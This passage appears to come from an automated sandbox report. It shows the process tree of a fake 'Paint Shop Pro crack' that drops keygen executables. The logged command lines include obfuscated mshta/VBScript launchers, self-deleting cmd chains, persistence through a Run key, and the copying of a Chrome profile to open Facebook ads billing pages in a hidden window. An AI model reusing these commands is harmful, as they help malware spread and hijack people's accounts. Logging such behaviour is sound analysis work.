                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:3976
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6048 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:4132
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3648 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:1800
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4188 /prefetch:8
                                                                                                                                  2⤵
                                                                                                                                    PID:2740
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6976 /prefetch:8
                                                                                                                                    2⤵
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:4752
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 /prefetch:8
                                                                                                                                    2⤵
                                                                                                                                      PID:5092
                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:2908
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                      2⤵
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      PID:4788
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                      2⤵
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:584
                                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:4460
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp2_Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.zip\Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp2_Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.zip\Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.exe"
                                                                                                                                      1⤵
                                                                                                                                        PID:4492
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                          2⤵
                                                                                                                                            PID:4700
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                              keygen-pr.exe -p83fsase3Ge
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3728
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:4644
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                  5⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:3832
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                              keygen-step-1.exe
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:1744
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                              keygen-step-5.exe
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3752
                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                "C:\Windows\System32\mshta.exe" VbscrIpT:cLose ( CReatEoBjeCt ( "wscRIpT.SheLL" ). RuN ( "C:\Windows\system32\cmd.exe /C Type ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If """"== """" for %a In ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -Im ""%~NXa"" /f > NuL " , 0 ) )
                                                                                                                                                4⤵
                                                                                                                                                  PID:4652
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C Type "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If ""== "" for %a In ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -Im "%~NXa" /f > NuL
                                                                                                                                                    5⤵
                                                                                                                                                      PID:4952
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe
                                                                                                                                                        NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4708
                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                          "C:\Windows\System32\mshta.exe" VbscrIpT:cLose ( CReatEoBjeCt ( "wscRIpT.SheLL" ). RuN ( "C:\Windows\system32\cmd.exe /C Type ""C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe"" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If ""/pfztvgOHczW8518 ""== """" for %a In ( ""C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe"" ) do taskkill -Im ""%~NXa"" /f > NuL " , 0 ) )
                                                                                                                                                          7⤵
                                                                                                                                                            PID:5084
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C Type "C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If "/pfztvgOHczW8518 "== "" for %a In ( "C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe" ) do taskkill -Im "%~NXa" /f > NuL
                                                                                                                                                              8⤵
                                                                                                                                                                PID:4256
                                                                                                                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              "C:\Windows\System32\regsvr32.exe" .\xUHTZND.6T /U -S
                                                                                                                                                              7⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                              PID:5056
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill -Im "keygen-step-5.exe" /f
                                                                                                                                                            6⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:3800
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                      keygen-step-2.exe
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                      PID:5088
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5341.tmp.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5341.tmp.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:3828
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\5341.tmp.exe"
                                                                                                                                                          5⤵
                                                                                                                                                            PID:5988
                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                              timeout /T 10 /NOBREAK
                                                                                                                                                              6⤵
                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                              PID:3844
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"
                                                                                                                                                          4⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          PID:4876
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"
                                                                                                                                                            5⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4700
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 272
                                                                                                                                                            5⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:3980
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                          4⤵
                                                                                                                                                            PID:2312
                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                              ping 127.0.0.1
                                                                                                                                                              5⤵
                                                                                                                                                              • Runs ping.exe
                                                                                                                                                              PID:2316
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                          keygen-step-3.exe
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:2872
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:3228
                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                5⤵
                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                PID:680
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                            keygen-step-4.exe
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Checks computer location settings
                                                                                                                                                            PID:4968
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Free.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Free.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              • Modifies registry class
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:4716
                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                                                                                                                5⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:2748
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:3836
                                                                                                                                                              • C:\ProgramData\1025963.exe
                                                                                                                                                                "C:\ProgramData\1025963.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                PID:4160
                                                                                                                                                              • C:\ProgramData\2918611.exe
                                                                                                                                                                "C:\ProgramData\2918611.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                PID:1972
                                                                                                                                                                • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                  "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:296
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops Chrome extension
                                                                                                                                                              PID:2040
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:4652
                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    PID:4108
                                                                                                                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                  xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                  PID:3000
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                  PID:4000
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffcca524f50,0x7ffcca524f60,0x7ffcca524f70
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:4076
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1920 /prefetch:8
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:4280
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1568 /prefetch:2
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:2200
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2180 /prefetch:8
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:2576
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2516 /prefetch:1
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:3864
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2748 /prefetch:1
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:3988
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3140 /prefetch:1
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:512
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:2808
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:1
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:1844
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:4592
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5388 /prefetch:8
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                      PID:940
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=6024 /prefetch:8
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                      PID:6128
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3644 /prefetch:8
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:6244
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2396 /prefetch:8
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:6696
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1948 /prefetch:8
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:6876
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3736 /prefetch:8
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:6996
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3972 /prefetch:2
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:7052
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1376 /prefetch:8
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:7112
                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5704 /prefetch:8
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:6236
                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1460 /prefetch:8
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:1016
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3992 /prefetch:8
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:308
                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1436,2591049530503875785,14340026033627662857,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2376 /prefetch:8
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:4952
                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
